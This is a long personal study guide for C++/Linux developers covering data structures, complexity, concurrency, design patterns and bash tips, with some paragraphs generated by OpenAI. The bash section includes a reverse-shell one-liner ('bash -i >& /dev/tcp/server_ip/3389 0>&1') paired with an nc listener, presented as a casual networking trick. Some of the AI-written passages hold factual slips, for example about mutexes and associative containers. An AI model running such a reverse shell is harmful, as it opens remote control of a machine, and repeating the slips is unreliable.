A Computer Science survival guide for C++/Linux developers
Thu Nov 30 05:04:02 UTC 2023
Let’s start with a haiku written by a computer.
C++ code so vast
Creating wonders so fast
Mysteries unfold
This reference is a distillation of 15+ years of online logbook notes into only the essentials that have remained relevant to a senior software developer today. Just for fun – and where the topic is readily available or established – I have reached out to OpenAI to provide a paragraph or two. Consequently, the exact content and the chapter order will vary each night. Hopefully this will keep repeat visits interesting and also prevents me focusing all my attention on the first few chapters.
If time is tight, try the random daily chapter. And you can also raise a ticket on this repo.
The C++ Standard Library containers provide a set of powerful, efficient data structures that make it easy to store and manipulate data. They are highly optimized for performance, portable across platforms and architectures, and manage their own memory, reducing the risk of leaks. Finally, they expose a rich API and integrate with the standard algorithms, making it easier to develop high-performance applications.
Sequence containers are data structures that store elements in a linear, ordered fashion. Examples include vectors, deques, and lists.
Associative containers are data structures that store elements in an unordered fashion, but provide access to elements via a key. Examples include maps, sets, and unordered_maps.
You should be comfortable explaining the complexity of your code. See the Big O Cheatsheet.
Complexity | Notation |
---|---|
Constant | O(1) |
Logarithmic | O(log n) |
Linear | O(n) |
Quadratic | O(n²) |
Exponential | O(2ⁿ) |
Linked lists have an average access complexity of O(n), while arrays have O(1): an array can index any element directly, whereas a list must be traversed from the head. However, linked lists are better for inserting and deleting elements, which can be done in constant time once you hold an iterator to the position.
A test is not a unit test if (paraphrasing Michael Feathers) it talks to a database, it communicates across the network, it touches the file system, or it can’t run at the same time as your other unit tests.
See the complete article.
For simple readonly types, pass by const value.
void func(const int p) {
}
For large readonly types – i.e., larger than a pointer – pass by const reference. You should also consider whether the type is trivially copyable (a shallow copy suffices) or requires a deep copy.
void func(const big_type& p) {
}
If the first thing you do is make a copy, pass by non-const value.
void func(int p) {
}
If you want to modify the caller’s copy, pass by non-const reference.
void func(int& p) {
}
The only difference between a class and a struct is the default access level: public, protected, private.
But typically a struct is used for “plain old data” or memory-mapped data where you do want the members laid out in a predictable way (virtuals/inheritance add the complication of a vtable pointer.)
Either way, you can test your assertions at compile time with static_assert and the type traits header.
struct A {
// public: <-- default for structs
int x_;
};
If the data are constrained by an invariant – i.e., not all values are valid – use a class.
class B {
private: // <-- default for classes
int x_; // must be between 0-1000
};
Design patterns are reusable solutions to commonly occurring problems in software design. The objective of design patterns is to provide a common language that designers and developers can use to communicate solutions to recurring problems and to make it easier to create more flexible, robust, and maintainable code. Design patterns also help developers to better understand the underlying software architecture, which in turn helps to create better software.
The factory design pattern is a creational design pattern that provides a way to encapsulate object creation code, allowing for the abstraction of the object creation process and the decoupling of the use of an object from its implementation. The pattern involves a factory object that is responsible for creating other objects based on some set of input. This allows for a single point of control for object creation, and allows for the flexibility of creating different types of objects based on the input.
Store a system configuration in an external text file and construct at runtime using the factory pattern.
The visitor design pattern is a behavioral design pattern that allows for the manipulation of individual objects within a larger collection of objects. This pattern uses a separate "visitor" object which is responsible for applying a specific operation to each object in a collection. The visitor object is able to traverse the collection and apply the desired operation to each object without having the knowledge of the structure of the collection itself. This enables the application of new operations to existing collections without having to modify the collection’s structure. Additionally, the visitor pattern allows for multiple operations to be applied to the collection’s objects with the same visitor.
The visitor pattern exploits a feature of subtype polymorphism named “double dispatch.”
Double dispatch in subtype polymorphism is a method of dispatching a function call to different implementations based on the runtime type of two objects involved in the method call. It works by having a method on one object call a method on the other object, passing in the type of the first object. The second object then uses the type information to determine which implementation to use for the method call. This allows for more specific and dynamic behavior than traditional single dispatch polymorphism.
Create a class hierarchy of shapes and define methods that operate on those shapes in a visitor class.
Hardware interface classes will typically be a const register map, which is a flyweight pattern. This is also an example of a singleton pattern, as it’s only initialised once regardless of how many instances are created. Additionally, if registers are actually wired to discrete lines they might be read-only, so the memento pattern is used to store the internal state.
“In computer science, reflection is the ability of a process to examine, introspect, and modify its own structure and behavior.”
See Wikipedia.
Dependency inversion is a software design principle that states that high-level modules should not depend on low-level modules, but rather they should both depend on abstractions. This principle helps to invert the dependencies between software components, helping to decouple software systems and reduce the risk of changes in one module breaking the other.
Object-oriented programming (OOP) is a programming paradigm that uses objects and their interactions to design applications and computer programs. OOP focuses on the creation of reusable code through the use of classes and objects. It emphasizes data abstraction and promotes code reusability by creating relationships between objects. OOP is based on the concept of encapsulation that allows data and functions to be bundled together in an object, and polymorphism which allows objects to take different forms. OOP also makes it easier to manage complex programs by providing structure and organization.
Ad-hoc Polymorphism: Ad-hoc polymorphism, also known as overloading, is a type of polymorphism in which a single function or operator can operate on multiple types of data.
Parametric Polymorphism: Parametric polymorphism is a type of polymorphism in which a function or data type is written generically, so that it handles values identically regardless of their type. C++ templates are a form of parametric polymorphism.
Subtype Polymorphism: Subtype polymorphism is a type of polymorphism in which an object can have multiple types, and the behavior of the object depends on the type. This type of polymorphism is often referred to as inheritance.
Coercion Polymorphism: Coercion polymorphism is a type of polymorphism in which an object of one type is automatically converted into an object of another type. This type of polymorphism helps to reduce the amount of code needed to write programs.
A standard question at interviews! A very nuanced feature of OOP in C++ but you can now test this at compile time with type traits.
Destructors must be declared virtual when the class contains virtual functions or is part of a polymorphic hierarchy. This ensures that the destructor of a derived class is called if an object is deleted via a pointer to the polymorphic base class.
The virtual specifier specifies that a non-static member function is virtual and supports dynamic dispatch. It may only appear in the decl-specifier-seq of the initial declaration of a non-static member function (i.e., when it is declared in the class definition).
In derived classes, you should mark overridden methods override to express intention and also protect from the base class being changed unwittingly.
A non-virtual class has a size of 1 because in C++ classes can’t have zero size (objects declared consecutively can’t have the same address.)
A virtual class has a size of 8 on a 64-bit machine because there’s a hidden pointer inside it pointing to a vtable. vtables are static translation tables, created for each virtual-class.
RAII stands for Resource Acquisition Is Initialization. It is a programming idiom used in C++ to ensure that resources that are acquired are properly released when no longer needed, regardless of how the code using the resource exits. It is achieved by tying resource lifetime to object lifetime; when an object is created, it acquires the resource, and when the object is destroyed, the resource is released automatically. This prevents memory leaks and other errors caused by the incorrect management of resources.
Jonathan Boccara’s CppCon 2018 talk 105 STL Algorithms in Less Than an Hour is well worth a watch for a quick overview.
Quicksort is the poster boy of sorting algorithms.
The time complexity of quicksort is O(n log n) on average, and O(n^2) in the worst case.
Below is a Python implementation just for fun. But how is it implemented in C++?
def quicksort(arr):
    if len(arr) <= 1:
        return arr
    pivot = arr[len(arr) // 2]
    left = [x for x in arr if x < pivot]
    middle = [x for x in arr if x == pivot]
    right = [x for x in arr if x > pivot]
    return quicksort(left) + middle + quicksort(right)

print(quicksort([3,6,8,10,1,2,1]))  # Prints [1, 1, 2, 3, 6, 8, 10]
Introsort is a sorting algorithm that combines the best features of quicksort, heapsort, and insertion sort. It starts with quicksort, which partitions the data into two sub-arrays around a chosen pivot element. If the recursion becomes too deep, the algorithm switches to heapsort, which guarantees O(n log n). Finally, small partitions are handed to a simple insertion sort, which is fast on short ranges. This combination provides a fast sorting method with a guaranteed worst case and good space complexity.
Introsort is in-place but not stable: i.e., equivalent elements are not guaranteed to remain in the same order. However, the Standard Library offers stable_ versions of various sorting algorithms (e.g., std::stable_sort).
If additional memory is available, stable_sort remains O(n log n). However, if it fails to allocate, it will degrade to an O(n log² n) algorithm.
https://leanpub.com/cpp-algorithms-guide
The threshold for switching to insertion sort varies for each compiler.
std::list
std::sort requires random access to the elements, so std::list has its own sort method, but it still (approximately) conforms to O(n log n). It can be implemented with merge sort, as moving elements is cheap with a linked list.
Considerations for choosing an algorithm: size of the input, and type of the input: e.g., partially sorted, random.
The complexity of different sorting algorithms can vary widely. The most common sorting algorithms can be divided into two categories: comparison sorts and non-comparison sorts.
Comparison sorts are algorithms that compare each element in the array to the other elements in order to sort them. Examples of comparison sorts include Bubble Sort, Insertion Sort, Selection Sort, Merge Sort, and Quick Sort. The time complexity of these sorting algorithms ranges from O(n²) for Bubble Sort and Insertion Sort, to O(n log n) for Merge Sort and Quick Sort.
Non-comparison sorts are algorithms that do not compare elements against each other in order to sort them. Examples of non-comparison sorts include Counting Sort, Radix Sort, and Bucket Sort, with time complexities such as O(n + k) for Counting Sort and O(nk) for Radix Sort. (Heap Sort, by contrast, is a comparison sort with O(n log n) complexity.)
Overall, the most efficient comparison sorts are Merge Sort, Quick Sort, and Heap Sort, which have an average time complexity of O(n log n).
All of these are Θ(n log n) in all cases, apart from Timsort, which has a best case of Ω(n), and Quicksort, which has a terrible O(n²) worst case (if we happen to always pick the worst pivot). Quicksort is a good all-rounder with an O(n log n) average case, but it does have that O(n²) worst case. It is said that this can be avoided by picking the pivot carefully, but an example can always be constructed where the chosen pivot is the worst case.
What is your experience with object-oriented programming?
Describe a project you have worked on that involved working with a large dataset.
What challenges have you faced when debugging a complex algorithm?
Explain the differences between a relational database and a non-relational database.
How would you go about designing a web application from scratch?
What is the difference between C and C++?
What is polymorphism and how is it implemented in C++?
What are the advantages and disadvantages of using templates in C++?
What is a namespace and how is it used in C++?
How does memory management work in C++?
This a large, complicated topic. See C++ Move Semantics - The Complete Guide by Nicolai M. Josuttis.
std::move
The && modifier indicates a parameter is an object that we intend to move from instead of copying
Mark move constructors and move assignment operators noexcept (the compiler-generated ones are anyway)
Processor caches are small, high-speed memory caches located on the processor or close to the processor. They store frequently used instructions and data so that the processor can access them quickly, allowing for faster processing speeds. Caches come in various sizes, with larger caches allowing for faster access to instructions and data. By caching the data, the processor does not need to access the main memory as often, which reduces the time it takes to complete tasks.
Cache coherence is a property of a multiprocessor system in which all the processors share the same memory. It ensures that when one processor modifies a memory location, the other processors can see the change. This is achieved by maintaining a consistent view of the data in the memory across all processors. Cache coherence protocols ensure that the caches remain consistent by using a variety of techniques such as snooping, broadcast, invalidation, and bus locking. These protocols ensure that the data in the caches is consistent, and that the caches remain coherent.
There are three kinds of cache misses: compulsory (the first access to a line), capacity (the working set no longer fits in the cache), and conflict (too many lines map to the same cache set).
Cache misses occur when the data that is requested by the CPU is not present in the cache. This can result in increased latency as the CPU has to go out to main memory to fetch the data. The more cache misses that occur, the slower the overall system performance will be.
The way virtual functions work may cause issues with caching: the object gains a hidden vtable pointer, and every call adds an indirection through the vtable that the prefetcher and branch predictor may not follow. But we may be able to use CRTP to avoid these costs.
Typically a cache-oblivious algorithm works by a recursive divide and conquer algorithm, where the problem is divided into smaller and smaller sub-problems. Eventually, one reaches a sub-problem size that fits into cache, regardless of the cache size.
Design to get the most value out of every single cacheline that is read. Split apart the functions and data.
Cache locality is a concept in computer architecture which states that programs tend to access data items that are clustered together in memory. This means that if a program accesses one data item, the next one it accesses is likely to be located in the same or nearby memory locations. This can create performance improvements due to the fact that data items can be fetched from the processor’s cache rather than the main memory, resulting in faster access times.
Argument-dependent lookup, also known as ADL, or Koenig lookup, is the set of rules for looking up the unqualified function names in function-call expressions, including implicit function calls to overloaded operators. These function names are looked up in the namespaces of their arguments in addition to the scopes and namespaces considered by the usual unqualified name lookup.
Notice begin and end parameters don’t specify a namespace, see ADL.
#include <algorithm>
#include <iostream>
#include <vector>
#include <iterator>

int main() {
    const std::vector v{1, 2, 3, 4, 5};
    std::copy(cbegin(v), cend(v), std::ostream_iterator<int>(std::cout, "\n"));
}
A hash function is a mathematical function that takes an input of any size and produces an output, called a hash, of a fixed size. It is used to generate a unique value for a given data set or item, usually for data security and integrity purposes. Hash functions are commonly used in data structures and algorithms, as well as in cryptography.
Typically parallelism makes you think “threads within a process” but it’s worth considering different points in the processing that could be executed/calculated in parallel.
See wikipedia.
time/program = instructions/program * clockCycles/instruction * time/clockCycle
Amdahl’s law is a principle that states that the speedup of a program or system using multiple processors in parallel computing is limited by the time needed for the sequential fraction of the program. The law is named after computer scientist Gene Amdahl, and was presented in his 1967 article "Validity of the Single Processor Approach to Achieving Large-Scale Computing Capabilities". The speedup in performance of a program or system is limited by the time needed for the part of the program that cannot be parallelized. This law implies that not all tasks can be accelerated by adding more processors.
It’s very easy to optimise the bits you are familiar with, but it’s not obvious how much your efforts will benefit the overall process: spend your time on the bottlenecks.
Multithreaded concepts are important: e.g., atomics, locks, issues with different designs, how to make things thread safe.
Why use multithreading? For performance and/or separation of concerns.
A routine can be described as reentrant if it can be interrupted without leaving the operation partially complete: the invariants remain true.
A good way to reason about your code is to consider the invariants that must be true at any given point in time. For a linked list, node A’s next pointer must point to node B and node B’s previous pointer must point to node A. However, if you are deleting an element from a linked list there will be a period where this invariant does not hold, and you must acquire mutual access to both nodes whilst the list is being updated; otherwise another thread may see the list in an invalid state.
OpenAI: Invariants are mathematical statements or logical expressions that remain true in all possible scenarios or under certain conditions. They are used in computer science to define properties of a system that should be maintained in order to ensure the correctness of the system, or to prove the correctness of a system. In other words, invariants are properties of a system that do not change over time.
A function is idempotent if it can be applied multiple times without changing the outcome. E.g., repeatedly pressing the “on” switch of an “on/off” pair: it’s still on. See Wikipedia.
tl;dr “Race condition: an unfortunate order of execution causes undesirable behaviour.”
OpenAI: Race conditions in computer science refer to situations in which the output of a computer program or system depends on the sequence or timing of other uncontrollable events. This can occur when two or more processes or threads are trying to access or modify the same data at the same time. If the order of access is not defined, a race condition can occur, resulting in unexpected or incorrect output. The term is most commonly used in the context of multi-threaded programs, but race conditions can occur in any type of computer program.
See the Dining philosophers problem.
A real world example: Ken and Barbie walk over to the barbecue. Ken grabs the last remaining sausage and attempts to acquire the hot sauce; meanwhile, Barbie has already secured the hot sauce and is waiting for the sausage to become available. A sausage cannot be enjoyed without hot sauce, so neither can proceed, and they remain stuck in a deadlock indefinitely.
A livelock occurs when measures are taken to avoid a deadlock, but the measures themselves do not resolve the conflict. For example, Ken and Barbie both agree to put down their respective items and try again; however, they both pick up the same item again and the stalemate continues.
OpenAI: Deadlocks occur when two or more threads, processes, or transactions are waiting for each other to finish, but they never do. This can cause a system to become unresponsive. Livelocks are similar to deadlocks, but instead of threads waiting for each other to finish, they continuously change their state in response to the other threads. This can cause a system to become unresponsive as well.
Run your code on different numbers of CPUs; it’s interesting how the bottlenecks move around depending on the available resources.
OpenAI:
1. Avoid long-running transactions: if possible, avoid running long-running transactions.
2. Use a lock timeout: a lock timeout allows the system to abort the transaction if a lock can’t be acquired in a certain amount of time.
3. Use lock escalation: lock escalation reduces the number of locks required for a transaction by using higher-level locks.
4. Use deadlock detection and resolution: deadlock detection and resolution algorithms can be used to detect and resolve deadlocks.
5. Use read-committed isolation levels: this isolation level reduces the likelihood of deadlocks by only allowing a transaction to acquire locks on resources that it needs to update.
6. Use multiple granular locks: this reduces the likelihood of a deadlock by ensuring that locks are acquired on resources in a predictable order.
7. Design transactions carefully: careful design of transactions can reduce the likelihood of deadlocks by ensuring that locks are acquired in the correct order.
In C++, std::scoped_lock locks multiple mutexes using a deadlock-avoidance algorithm, so acquiring them together avoids the inconsistent lock ordering that causes deadlock.
OpenAI: Mutex and semaphore are both synchronization primitives that are used to control access to shared resources.
A mutex is a locking mechanism that is used to synchronize access to a resource by multiple threads. It is "locked" by one thread and "unlocked" by another, allowing only one thread at a time to access the resource.
A semaphore is a signaling mechanism that allows threads to communicate with each other. It is used to signal when a resource is available or when a certain condition has been met. Unlike a mutex, a semaphore can be used to allow multiple threads to access a resource simultaneously.
See Mutex vs Semaphore.
This is getting into the weeds, but mutexes and the data they protect can happily be declared consecutively in the code; so consider what this might mean when both mutex and data share the same cache line.
tl;dr A thread is a branch of execution. A process can consist of multiple threads.
OpenAI: Threads and processes are both ways of running instructions on a computer. A thread is a single sequence of instructions within a process while a process is a program running on the computer. Threads can be thought of as multiple lines of instruction within a process. Processes have their own memory address space and resources, while threads share the same memory address space and resources as the process they are part of. Threads are typically faster than processes as they can share data and resources more efficiently. Processes are more secure as they have their own memory address space and resources, which prevents one process from accessing the resources of another.
See Linux Debuginfo Formats - DWARF, ELF, dwo, dwp - What are They All? - Greg Law - CppCon 2022.
Section | Description |
---|---|
stack / | Local variables |
heap /\ | Dynamic memory |
.rodata | Read-only data |
.bss | Uninitialised data |
.data | Initialised data |
.text | Code |
Text Segment: This is the code segment which contains the actual instructions to be executed. It usually contains the program code, as well as any constants and variables used by the program.
Data Segment: This segment contains initialized and uninitialized data used by the program.
BSS Segment: This segment contains uninitialized data such as global variables and static variables.
Heap Segment: This segment is used to store dynamically allocated memory.
Stack Segment: This segment is used to store local variables and function parameters.
Internal Linkage: Objects with internal linkage are only visible within the translation unit (TU) in which they are defined. This means that they can’t be used in other TUs. In C++, static variables and functions have internal linkage.
External Linkage: Objects with external linkage are visible to all other TUs in a program. This means that variables and functions with external linkage can be used in multiple TUs. In C++, variables and functions that are declared without the static keyword have external linkage.
Dependencies on static variables in different translation units are, in general, a code smell and should be a reason for refactoring.
http://www.modernescpp.com/index.php/c-20-static-initialization-order-fiasco
If an object or function inside such a translation unit has internal linkage, then that specific symbol is only visible to the linker within that translation unit. If an object or function has external linkage, the linker can also see it when processing other translation units. The static keyword, when used in the global namespace, forces a symbol to have internal linkage. The extern keyword results in a symbol having external linkage.
std::call_once vs double-checked locking
Anonymous namespaces: used to declare many things with internal linkage.
namespace {
int a = 0;
int b = 0;
int c = 0;
}
This is all a lot easier since std::thread was introduced in C++11: now we have a platform-independent interface. See the C++ concurrency support library examples.
However, remember there is an overhead in creating a thread: if the operation you’re repeating is quick then could it actually take longer to parallelise it? You need to profile: how long does it take to just create a thread?
std::async
Think of it like pushing a calculation into the background. std::async executes a function asynchronously and returns a std::future that will eventually hold the result of that function call: quite a nice way to reference the result of a calculation executed in another thread. Also, it manages the issue of creating too many threads: excess tasks will just be executed sequentially. Additionally, exceptions thrown in the asynchronous routine are stored in the future and rethrown by the calling get() routine.
std::thread
You need to call join() for every thread created with std::thread. This can be done by storing your threads in a vector and joining each of them in a loop.
std::jthread
Like a regular thread but you don’t have to join it in the caller: it actually joins for you in the destructor. Quite nice to not have to remember to join, but joining all your threads can be a convenient synchronisation point.
Many of the Standard Library algorithms can take an execution policy, which is quite an exciting way to parallelise existing code. But remember it offers no protection of shared data: it’s still just a bunch of threads.
std::execution::seq: execution may not be parallelized
std::execution::par: execution may be parallelized
std::execution::par_unseq: execution may be parallelized, vectorized, or migrated across threads (such as by a parent-stealing scheduler)
std::execution::unseq: execution may be vectorized, e.g., executed on a single thread using instructions that operate on multiple data items
Some of these have an _if version that takes an additional predicate: e.g., std::replace and std::replace_if.
std::sort
std::copy
std::transform
std::accumulate
std::for_each
std::reduce
std::inclusive_scan
std::exclusive_scan
std::transform_reduce
std::remove
std::count
std::max_element
std::min_element
std::find
std::generate
std::mutex
A standard way to protect access to something, but there are multiple ways to unlock it.
Here be dragons! In the shape of deadlocks. There are several strategies to improve your chances of not becoming stuck; see the deadlock chapter for more.
You can use std::scoped_lock with multiple resources or a single one, but I also think it expresses intention better, by virtue of having “scope” in the name.
std::mutex
std::atomic
std::scoped_lock
std::lock_guard
std::thread and join()
std::jthread (auto join)
See the Standard Library concurrency support library.
#include <iostream>
#include <thread>
#include <mutex>
#include <condition_variable>
#include <queue>

const int MAX_SIZE = 10;

std::mutex m;
std::condition_variable cv;
std::queue<int> q;

void producer()
{
    int i = 0;
    while (true) {
        std::unique_lock<std::mutex> lk(m);
        cv.wait(lk, [] { return q.size() < MAX_SIZE; });
        q.push(i++);
        std::cout << "Produced " << i - 1 << std::endl;
        lk.unlock();
        cv.notify_one();
    }
}

void consumer()
{
    while (true) {
        std::unique_lock<std::mutex> lk(m);
        cv.wait(lk, [] { return q.size() > 0; });
        int item = q.front();
        q.pop();
        std::cout << "Consumed " << item << std::endl;
        lk.unlock();
        cv.notify_one();
    }
}

int main()
{
    std::thread t1(producer);
    std::thread t2(consumer);
    t1.join();
    t2.join();
    return 0;
}
Construction of a building is often used to describe the software design process, but the analogy breaks down: the building designer only has one attempt to compile the building. You can’t swap out the foundation halfway through.
Actually, in Royce’s later revisions of the model, he stated that the whole process should be done “twice if possible”.
Validation is concerned with checking that the system will meet the customer’s actual needs. Verification will help to determine whether the software is of high quality, but it will not ensure that the system is useful.
Verification is objective (quality), validation is subjective (customer needs).
Validation is the process of checking whether the specification captures the customer’s needs, while verification is the process of checking that the software meets the specification.
See difference between verification and validation.
What to call your test is easy – it’s a sentence describing the next behaviour in which you are interested. How much to test becomes moot – you can only describe so much behaviour in a single sentence. When a test fails, simply work through the process described above – either you introduced a bug, the behaviour moved, or the test is no longer relevant.
Test-driven development (TDD) is a software development process that relies on the repetition of a short development cycle: requirements are turned into specific test cases, then the software is improved to pass the new tests, only. This is opposed to software development that allows software to be added that is not proven to meet requirements.
As a [X] I want [Y] in order to [Z]
In 2014 Randall Munroe estimated that Google stores 10 exabytes of data across all of its operations. However, as a C++ developer, you will only come across at most petabytes of storage; and if CPUs are topping out at gigahertz, then you won’t see anything much faster than a nanosecond.
Multiple | Prefix | Prefix | Fraction |
---|---|---|---|
1 000 | kilo | milli | .001 |
1 000 000 | mega | micro | .000 001 |
1 000 000 000 | giga | nano | .000 000 001 |
1 000 000 000 000 | tera | pico | .000 000 000 001 |
1 000 000 000 000 000 | peta | femto | .000 000 000 000 001 |
1 000 000 000 000 000 000 | exa | atto | .000 000 000 000 000 001 |
1 000 000 000 000 000 000 000 | zetta | zepto | .000 000 000 000 000 000 001 |
See list of SI prefixes.
You may be tempted to use binary prefixes to be more precise – kibi, mebi, gibi, etc – but most people won’t know what you’re talking about. Also, manufacturers tend to use 1000³ rather than 2³⁰ because it makes their numbers look better.
See why is everyone in such a rush?
1/1000000000 second == 1 nanosecond
Approximate durations of typical operations (rounded to help remember.)
Action | Duration (nanoseconds) |
---|---|
L1 cache read, variable increment | <1 |
Branch misprediction (how do you measure this?) | 5 |
L2 cache read, std::atomic | 10 |
std::mutex/scoped_lock | 20 |
Fetch from main memory | 100 |
Semaphore acquire | 200 |
Send 2KiB over 1Gbps network | 20,000 |
Create a std::thread | 20,000 |
Send packet from US to Europe and back | 200,000,000 |
“Generic programming is why we can’t have nice things” – Andrei Alexandrescu
constexpr
– find undefined behaviour at compile time
Template metaprogramming is a programming technique in which templates are used to generate program code during compilation. It is a powerful way to create generic algorithms and data structures and to optimise code: the compiler does the work once, rather than the program doing it repeatedly at runtime. Its main advantage is code that is both highly efficient and highly expressive while remaining maintainable and readable, and it can also be more type-safe than traditional code.
Templates are used in the C++ Standard Library to allow functions and classes to operate with a range of data types without the need for a programmer to create a separate version of the function or class for each type. This allows functions and classes to be written once and used with any data type that can meet the requirements of the function or class. Templates also provide type safety, ensuring that the correct type is used when calling a function or creating an instance of a class.
SFINAE stands for Substitution Failure Is Not An Error. When the compiler substitutes template arguments into a candidate and the substitution fails, that candidate is silently removed from the overload set rather than triggering a compiler error. This lets multiple template overloads coexist, with invalid specialisations simply ignored. SFINAE is often used to control template argument deduction and to create type traits.
See OSI on Wikipedia.
Layer | Description |
---|---|
Layer 7 | Application |
Layer 6 | Presentation |
Layer 5 | Session |
Layer 4 | Transport |
Layer 3 | Network |
Layer 2 | Data Link |
Layer 1 | Physical |
The TCP three way handshake begins when a client sends a TCP SYN (synchronize) packet to a server. The SYN packet contains the initial sequence number for the client.
The server responds with a SYN-ACK (synchronize-acknowledge) packet, which contains the initial sequence number for the server and an acknowledgment of the client’s initial sequence number.
The client then sends an ACK (acknowledge) packet to the server, which acknowledges the server’s initial sequence number. This completes the three way handshake and establishes a connection between the two hosts.
SYN stands for “synchronise”.
=> SYN
<= SYN-ACK
=> ACK
=> HTTP (request)
<= ACK
<= HTTP (response)
=> ACK
=> FIN
<= FIN-ACK
=> ACK
As a Linux developer you need a strong command line game.
bash
is ubiquitous, and a powerful language in itself,
without resorting to something like Python.
git
is awesome on the command line and pretty much
essential. Use it to manage your chores. See how
to undo almost anything with git.
(echo hello; sleep 1) | telnet 127.0.0.1 80
echo hello > /dev/tcp/127.0.0.1/80
echo hello | nc localhost 80
# server
nc -knvlp 3389
# client
bash -i >& /dev/tcp/server_ip/3389 0>&1
git add !(unit.md)
shuf -n 1 readme.txt
From bash 5.
echo $EPOCHREALTIME
1614870873.574544
echo $EPOCHSECONDS
1614870876
The three load average values are 1, 5 and 15 minutes.
uptime
15:29:28 up 20:23, 0 users, load average: 5.08, 1.49, 0.51
Stress your system in different ways.
stress --cpu 8
echo $(nproc)
localhost
127.0.0.1
127.0.0.2
127.0.0.3
127.1
0.0.0.0
0 # wut
mv {,_}.bash_history
watch -d ip a
pushd equivalent
I use this all the time. Rather than pushd and popd to navigate around the file system:
# Navigate to new dir
cd ~/deanturpin.gitlab.io/content/post
# Return whence you came
cd -
It’s important to know the common data structures and their characteristics.
std::vector
std::vector
is the go-to container, so let’s give it
some special attention. It has contiguous storage – therefore cache
friendly – and uses the RAII
paradigm: the data are created on the heap and the allocation and
deallocation (new/delete) are handled for you. Interestingly,
std::string
exhibits many of the same characteristics, but
it’s not quite containery enough to qualify.
Estimate how many times the fax
destructor is called
below.
#include <iostream>
#include <vector>

auto x = 0uz;

int main() {
  struct fax {

    // Constructor and destructor
    fax() { std::cout << x << " ctor\n"; }
    ~fax() { std::cout << "\t" << x << " dtor\n"; }

    // Copy constructors
    fax(const fax&) { std::cout << x << " copy ctor\n"; };
    fax(fax&&) { std::cout << x << " move ctor\n"; };

    // Assignment constructors
    fax& operator=(const fax&) {
      std::cout << x << " copy assignment ctor\n";
      return *this;
    }
    fax& operator=(fax&&) {
      std::cout << x << " move assignment ctor\n";
      return *this;
    };

    const size_t id = x++;
  };

  std::vector<fax> y;

  // Reduce copies by allocating up front
  // y.reserve(3);

  for (size_t i = 0; i < 3; ++i) {
    y.push_back(fax{});
    std::cout << "-- capacity " << y.capacity() << " --\n";
  }

  // fax f1 = fax{};
  // fax f2 = std::move(fax{});
}
See the program output (below), note how the capacity is growing exponentially (doubling each time).
1 ctor
2 move ctor
2 dtor
-- capacity 1 --
3 ctor
4 move ctor
5 copy ctor
5 dtor
5 dtor
-- capacity 2 --
6 ctor
7 move ctor
8 copy ctor
9 copy ctor
9 dtor
9 dtor
9 dtor
-- capacity 4 --
9 dtor
9 dtor
9 dtor
For each push we call the default constructor to create a temporary object and then a move constructor to populate the new element… so far so good. But crucially, when the vector is resized we must also copy all the existing elements into the new allocation: copies rather than moves, because the move constructor above is not declared noexcept. Not an issue for this simple case, but if the class is expensive to copy there could be trouble ahead. Additionally, if there’s a bug in the copy constructor, we may be corrupting existing valid data simply by copying it around.
Binary search trees have an amortized complexity of O(log n) unless
the tree is unbalanced. Worst case, if the tree is unbalanced, then it
is O(n). std::set
and std::map
are implemented
using a red-black tree, a type of balanced binary search tree. C++23
introduces std::flat_map
which is implemented using
contiguous storage to make it more cache-friendly.
A binary search tree (BST) is a type of data structure which is used to store data in a specific order. It is a type of binary tree where each node has at most two children, which are referred to as the left child and the right child. The left subtree of a node contains only nodes with values less than the parent node, while the right subtree of a node contains only nodes with values greater than the parent node. An in-order traversal therefore visits the nodes in sorted order. The BST is very efficient for searching and sorting because it allows quick access to the data.
A balanced tree is one of height O(log n), where n is the number of nodes in the tree. It is a sorted hierarchy of data where the left most node is the smallest, and the right most node is the largest.
Below each node of a binary search tree is a mini tree. The top of the tree is the middle element.
e|            /e
d|           d
c|          / \c
b|        b
a|       / \ /a
9|-----/    9
8|       \ / \8
7|  7
6|       / \ /6
5|-----\    5
4|       \ / \4
3|        3
2|          \ /2
1|           1
0|            \0
Hash tables have an amortized complexity of O(1) unless there are collisions. Worst case, if everything is in the same bin, then it is O(n). Additionally, if the proportion of slots – known as “load factor” or “fill ratio” – exceeds a threshold, then the hash table must be resized/rebuilt.
std::unordered_set
and std::unordered_map
are implemented using hash tables.
A heap is a useful data structure when it is necessary to repeatedly remove the object with the highest (or lowest) priority.
Support of random access iterators is required to keep a heap structure internally at all times. A min heap keeps its smallest element on top, but unlike a sorted list the remaining elements are only partially ordered.
123456789abcdef
1
23
4567
89abcdef
Projecting down, the top of the tree is the smallest element.
1
2 3
4 5 6 7
8 9 a b c d e f
       1
      / \
     /   \
    /     \
   2       3
  / \     / \
 4   5   6   7
/ \ / \ / \ / \
8 9 a b c d e f
A heap is a special type of tree-based data structure that stores data in a specific way such that it can be efficiently accessed. Heaps are typically implemented as binary trees, and the elements stored in a heap must have a specific order. Heaps are commonly used for priority queues, and can also be used for sorting.
A binary search tree (BST) is a type of tree-based data structure that can be used to store data in an organized way. BSTs are typically implemented as binary trees, and the elements stored in a BST must have a specific order. BSTs are commonly used for searching and sorting data, and can also be used to store data in an efficient manner. Unlike heaps, BSTs maintain a total ordering: an in-order traversal visits the elements in sorted order.
Adding/removing at the beginning is O(1), but adding at the end means traversing the whole list, therefore O(n). Searching is also O(n).
std::forward_list
is a singly linked list.
Like a singly linked list but we can iterate both ways. It stores a pointer to both the beginning and end, therefore operations on the end are also O(1).
std::list
is a doubly linked list.
Container | Insertion | Deletion | Lookup |
---|---|---|---|
vector | O(1) | O(n) | O(n) |
list | O(1) | O(1) | O(n) |
set | O(log n) | O(log n) | O(log n) |
map | O(log n) | O(log n) | O(log n) |
unordered_set | O(1) | O(1) | O(1) |
unordered_map | O(1) | O(1) | O(1) |
However, the conventional CS wisdom for when to use a linked list over contiguous storage hasn’t applied for years: you have to measure. E.g., if a container fits in the cache, a vector might outperform everything else.
As of 7 September 2023:
The big things for me are ranges and views: effortlessly express and manipulate ranges of data with zero iterators; they read naturally and are also lazy-evaluated (looking forward to ranges_to<>). Concepts I’ve used a little, but mostly to narrow the allowed types of an auto parameter: e.g., std::floating_point auto.
I’ve attempted to deep dive into templates a few times and it’s
really quite an unpleasant language! However, whilst not a recent
addition, constexpr
is becoming increasingly supported; it
gives you the readability of “normal” code with the potential
performance benefits of compile-time. And it also finds UB! However, you
quickly hit the issue where something isn’t constexpr
so
you have to either implement it yourself or not bother.
Coroutines are quite high-profile but I haven’t got into them yet. Finally, the multidimensional array operator should be an interesting addition.
Things that are in the standard but aren’t properly supported:
modules haven’t yet been implemented sufficiently in gcc or clang.
std::print is really cool but you still need to install a separate library (fmtlib).
